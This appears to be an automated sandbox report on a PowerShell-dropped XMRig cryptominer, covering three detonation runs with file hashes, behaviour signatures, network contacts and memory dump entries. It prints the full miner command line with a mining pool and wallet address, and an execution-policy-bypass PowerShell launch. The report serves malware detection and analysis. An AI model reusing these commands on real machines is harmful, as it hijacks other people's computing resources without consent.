| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
Analysis: behavioral21
Detonation Overview
Submitted
2024-05-27 00:27
Reported
2024-05-27 05:27
Platform
win10-20240404-en
Max time kernel
1790s
Max time network
1796s
Command Line
Signatures
XMRig Miner payload
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 4520 wrote to memory of 3508 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 4520 wrote to memory of 3508 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (7).ps1"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.108.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | rx.unmineable.com | udp |
| GB | 161.35.34.195:443 | rx.unmineable.com | tcp |
| US | 8.8.8.8:53 | 195.34.35.161.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 11.227.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 253.15.104.51.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 203.107.17.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 144.107.17.2.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_xkcsgljt.ihk.ps1
| MD5 | c4ca4238a0b923820dcc509a6f75849b |
| SHA1 | 356a192b7913b04c54574d18c28d46e6395428ab |
| SHA256 | 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b |
| SHA512 | 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a |
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
memory/3508-143-0x00007FF6B9B80000-0x00007FF6BA7B3000-memory.dmp
memory/3508-144-0x00007FF6B9B80000-0x00007FF6BA7B3000-memory.dmp
memory/3508-145-0x00007FF6B9B80000-0x00007FF6BA7B3000-memory.dmp
memory/3508-146-0x00007FF6B9B80000-0x00007FF6BA7B3000-memory.dmp
memory/3508-147-0x00007FF6B9B80000-0x00007FF6BA7B3000-memory.dmp
memory/3508-148-0x00007FF6B9B80000-0x00007FF6BA7B3000-memory.dmp
memory/3508-149-0x00007FF6B9B80000-0x00007FF6BA7B3000-memory.dmp
memory/3508-150-0x00007FF6B9B80000-0x00007FF6BA7B3000-memory.dmp
memory/3508-151-0x00007FF6B9B80000-0x00007FF6BA7B3000-memory.dmp
memory/3508-152-0x00007FF6B9B80000-0x00007FF6BA7B3000-memory.dmp
memory/3508-153-0x00007FF6B9B80000-0x00007FF6BA7B3000-memory.dmp
memory/3508-154-0x00007FF6B9B80000-0x00007FF6BA7B3000-memory.dmp
memory/3508-155-0x00007FF6B9B80000-0x00007FF6BA7B3000-memory.dmp
memory/3508-156-0x00007FF6B9B80000-0x00007FF6BA7B3000-memory.dmp
memory/3508-157-0x00007FF6B9B80000-0x00007FF6BA7B3000-memory.dmp
Analysis: behavioral22
Detonation Overview
Submitted
2024-05-27 00:27
Reported
2024-05-27 05:27
Platform
win10-20240404-en
Max time kernel
1799s
Max time network
1779s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 4776 wrote to memory of 1528 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 4776 wrote to memory of 1528 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (7).ps1"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.108.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | rx.unmineable.com | udp |
| GB | 161.35.34.195:443 | rx.unmineable.com | tcp |
| US | 8.8.8.8:53 | 195.34.35.161.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 11.173.189.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 203.107.17.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 144.107.17.2.in-addr.arpa | udp |
| US | 138.91.171.81:80 | | tcp |
| US | 8.8.8.8:53 | 164.189.21.2.in-addr.arpa | udp |
Files
memory/4776-2-0x00007FFBD5FE3000-0x00007FFBD5FE4000-memory.dmp
memory/4776-5-0x000001866BA80000-0x000001866BAA2000-memory.dmp
memory/4776-6-0x00007FFBD5FE0000-0x00007FFBD69CC000-memory.dmp
memory/4776-9-0x000001866BBB0000-0x000001866BC26000-memory.dmp
memory/4776-18-0x00007FFBD5FE0000-0x00007FFBD69CC000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_zdiwrfl2.kr4.ps1
| MD5 | c4ca4238a0b923820dcc509a6f75849b |
| SHA1 | 356a192b7913b04c54574d18c28d46e6395428ab |
| SHA256 | 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b |
| SHA512 | 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a |
memory/4776-25-0x00007FFBD5FE0000-0x00007FFBD69CC000-memory.dmp
memory/4776-48-0x000001866B990000-0x000001866B9A2000-memory.dmp
memory/4776-61-0x000001866B980000-0x000001866B98A000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
memory/1528-90-0x000001D0E8EC0000-0x000001D0E8EE0000-memory.dmp
memory/1528-91-0x00007FF6362C0000-0x00007FF636EF3000-memory.dmp
memory/1528-92-0x00007FF6362C0000-0x00007FF636EF3000-memory.dmp
memory/4776-93-0x00007FFBD5FE3000-0x00007FFBD5FE4000-memory.dmp
memory/4776-94-0x00007FFBD5FE0000-0x00007FFBD69CC000-memory.dmp
memory/4776-95-0x00007FFBD5FE0000-0x00007FFBD69CC000-memory.dmp
memory/1528-96-0x00007FF6362C0000-0x00007FF636EF3000-memory.dmp
memory/1528-97-0x00007FF6362C0000-0x00007FF636EF3000-memory.dmp
memory/1528-98-0x00007FF6362C0000-0x00007FF636EF3000-memory.dmp
memory/1528-99-0x00007FF6362C0000-0x00007FF636EF3000-memory.dmp
memory/1528-100-0x00007FF6362C0000-0x00007FF636EF3000-memory.dmp
memory/1528-101-0x00007FF6362C0000-0x00007FF636EF3000-memory.dmp
memory/1528-102-0x00007FF6362C0000-0x00007FF636EF3000-memory.dmp
memory/1528-103-0x00007FF6362C0000-0x00007FF636EF3000-memory.dmp
memory/1528-104-0x00007FF6362C0000-0x00007FF636EF3000-memory.dmp
memory/1528-105-0x00007FF6362C0000-0x00007FF636EF3000-memory.dmp
memory/1528-106-0x00007FF6362C0000-0x00007FF636EF3000-memory.dmp
memory/1528-107-0x00007FF6362C0000-0x00007FF636EF3000-memory.dmp
memory/1528-108-0x00007FF6362C0000-0x00007FF636EF3000-memory.dmp
memory/1528-109-0x00007FF6362C0000-0x00007FF636EF3000-memory.dmp
memory/1528-110-0x00007FF6362C0000-0x00007FF636EF3000-memory.dmp
memory/1528-111-0x00007FF6362C0000-0x00007FF636EF3000-memory.dmp
memory/1528-112-0x00007FF6362C0000-0x00007FF636EF3000-memory.dmp
memory/1528-113-0x00007FF6362C0000-0x00007FF636EF3000-memory.dmp
memory/1528-114-0x00007FF6362C0000-0x00007FF636EF3000-memory.dmp
memory/1528-115-0x00007FF6362C0000-0x00007FF636EF3000-memory.dmp
memory/1528-116-0x00007FF6362C0000-0x00007FF636EF3000-memory.dmp
memory/1528-117-0x00007FF6362C0000-0x00007FF636EF3000-memory.dmp
memory/1528-118-0x00007FF6362C0000-0x00007FF636EF3000-memory.dmp
memory/1528-119-0x00007FF6362C0000-0x00007FF636EF3000-memory.dmp
memory/1528-120-0x00007FF6362C0000-0x00007FF636EF3000-memory.dmp
memory/1528-121-0x00007FF6362C0000-0x00007FF636EF3000-memory.dmp
memory/1528-122-0x00007FF6362C0000-0x00007FF636EF3000-memory.dmp
memory/1528-123-0x00007FF6362C0000-0x00007FF636EF3000-memory.dmp
memory/1528-124-0x00007FF6362C0000-0x00007FF636EF3000-memory.dmp
memory/1528-125-0x00007FF6362C0000-0x00007FF636EF3000-memory.dmp
memory/1528-126-0x00007FF6362C0000-0x00007FF636EF3000-memory.dmp
memory/1528-127-0x00007FF6362C0000-0x00007FF636EF3000-memory.dmp
memory/1528-128-0x00007FF6362C0000-0x00007FF636EF3000-memory.dmp
memory/1528-129-0x00007FF6362C0000-0x00007FF636EF3000-memory.dmp
memory/1528-130-0x00007FF6362C0000-0x00007FF636EF3000-memory.dmp
memory/1528-131-0x00007FF6362C0000-0x00007FF636EF3000-memory.dmp
memory/1528-132-0x00007FF6362C0000-0x00007FF636EF3000-memory.dmp
memory/1528-133-0x00007FF6362C0000-0x00007FF636EF3000-memory.dmp
memory/1528-134-0x00007FF6362C0000-0x00007FF636EF3000-memory.dmp
memory/1528-135-0x00007FF6362C0000-0x00007FF636EF3000-memory.dmp
memory/1528-136-0x00007FF6362C0000-0x00007FF636EF3000-memory.dmp
memory/1528-137-0x00007FF6362C0000-0x00007FF636EF3000-memory.dmp
memory/1528-138-0x00007FF6362C0000-0x00007FF636EF3000-memory.dmp
memory/1528-139-0x00007FF6362C0000-0x00007FF636EF3000-memory.dmp
memory/1528-140-0x00007FF6362C0000-0x00007FF636EF3000-memory.dmp
memory/1528-141-0x00007FF6362C0000-0x00007FF636EF3000-memory.dmp
memory/1528-142-0x00007FF6362C0000-0x00007FF636EF3000-memory.dmp
memory/1528-143-0x00007FF6362C0000-0x00007FF636EF3000-memory.dmp
memory/1528-144-0x00007FF6362C0000-0x00007FF636EF3000-memory.dmp
memory/1528-145-0x00007FF6362C0000-0x00007FF636EF3000-memory.dmp
memory/1528-146-0x00007FF6362C0000-0x00007FF636EF3000-memory.dmp
memory/1528-147-0x00007FF6362C0000-0x00007FF636EF3000-memory.dmp
memory/1528-148-0x00007FF6362C0000-0x00007FF636EF3000-memory.dmp
memory/1528-149-0x00007FF6362C0000-0x00007FF636EF3000-memory.dmp
memory/1528-150-0x00007FF6362C0000-0x00007FF636EF3000-memory.dmp
memory/1528-151-0x00007FF6362C0000-0x00007FF636EF3000-memory.dmp
memory/1528-152-0x00007FF6362C0000-0x00007FF636EF3000-memory.dmp
memory/1528-153-0x00007FF6362C0000-0x00007FF636EF3000-memory.dmp
memory/1528-154-0x00007FF6362C0000-0x00007FF636EF3000-memory.dmp
memory/1528-155-0x00007FF6362C0000-0x00007FF636EF3000-memory.dmp
memory/1528-156-0x00007FF6362C0000-0x00007FF636EF3000-memory.dmp
Analysis: behavioral27
Detonation Overview
Submitted
2024-05-27 00:27
Reported
2024-05-27 05:30
Platform
win10v2004-20240508-en
Max time kernel
1799s
Max time network
1758s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 4788 wrote to memory of 3000 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 4788 wrote to memory of 3000 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (8).ps1"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.108.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 149.220.183.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 203.107.17.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 74.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | rx.unmineable.com | udp |
| GB | 161.35.34.195:443 | rx.unmineable.com | tcp |
| US | 8.8.8.8:53 | 195.34.35.161.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 154.239.44.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 241.150.49.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 103.169.127.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 198.187.3.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 144.107.17.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 19.229.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 26.178.89.13.in-addr.arpa | udp |
Files
memory/4788-0-0x00007FFD5B973000-0x00007FFD5B975000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_u5r2fz2l.xkh.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/4788-10-0x0000022DBB1B0000-0x0000022DBB1D2000-memory.dmp
memory/4788-11-0x00007FFD5B970000-0x00007FFD5C431000-memory.dmp
memory/4788-12-0x00007FFD5B970000-0x00007FFD5C431000-memory.dmp
memory/4788-14-0x00007FFD5B970000-0x00007FFD5C431000-memory.dmp
memory/4788-15-0x0000022DBB420000-0x0000022DBB432000-memory.dmp
memory/4788-16-0x0000022DB8FA0000-0x0000022DB8FAA000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
memory/3000-47-0x00000185B96A0000-0x00000185B96C0000-memory.dmp
memory/3000-48-0x00000185B96F0000-0x00000185B9710000-memory.dmp
memory/3000-49-0x00007FF6C9160000-0x00007FF6C9D93000-memory.dmp
memory/3000-50-0x00007FF6C9160000-0x00007FF6C9D93000-memory.dmp
memory/3000-51-0x00000185B9710000-0x00000185B9730000-memory.dmp
memory/4788-52-0x00007FFD5B973000-0x00007FFD5B975000-memory.dmp
memory/4788-53-0x00007FFD5B970000-0x00007FFD5C431000-memory.dmp
memory/3000-54-0x00000185BAFF0000-0x00000185BB010000-memory.dmp
memory/4788-55-0x00007FFD5B970000-0x00007FFD5C431000-memory.dmp
memory/3000-56-0x00007FF6C9160000-0x00007FF6C9D93000-memory.dmp
memory/3000-58-0x00000185B9710000-0x00000185B9730000-memory.dmp
memory/3000-57-0x00007FF6C9160000-0x00007FF6C9D93000-memory.dmp
memory/3000-59-0x00000185BAFF0000-0x00000185BB010000-memory.dmp
memory/3000-60-0x00007FF6C9160000-0x00007FF6C9D93000-memory.dmp
memory/3000-61-0x00007FF6C9160000-0x00007FF6C9D93000-memory.dmp
memory/3000-62-0x00007FF6C9160000-0x00007FF6C9D93000-memory.dmp
memory/3000-63-0x00007FF6C9160000-0x00007FF6C9D93000-memory.dmp
memory/3000-64-0x00007FF6C9160000-0x00007FF6C9D93000-memory.dmp
memory/3000-65-0x00007FF6C9160000-0x00007FF6C9D93000-memory.dmp
memory/3000-66-0x00007FF6C9160000-0x00007FF6C9D93000-memory.dmp
memory/3000-67-0x00007FF6C9160000-0x00007FF6C9D93000-memory.dmp
memory/3000-68-0x00007FF6C9160000-0x00007FF6C9D93000-memory.dmp
memory/3000-69-0x00007FF6C9160000-0x00007FF6C9D93000-memory.dmp
memory/3000-70-0x00007FF6C9160000-0x00007FF6C9D93000-memory.dmp
memory/3000-71-0x00007FF6C9160000-0x00007FF6C9D93000-memory.dmp
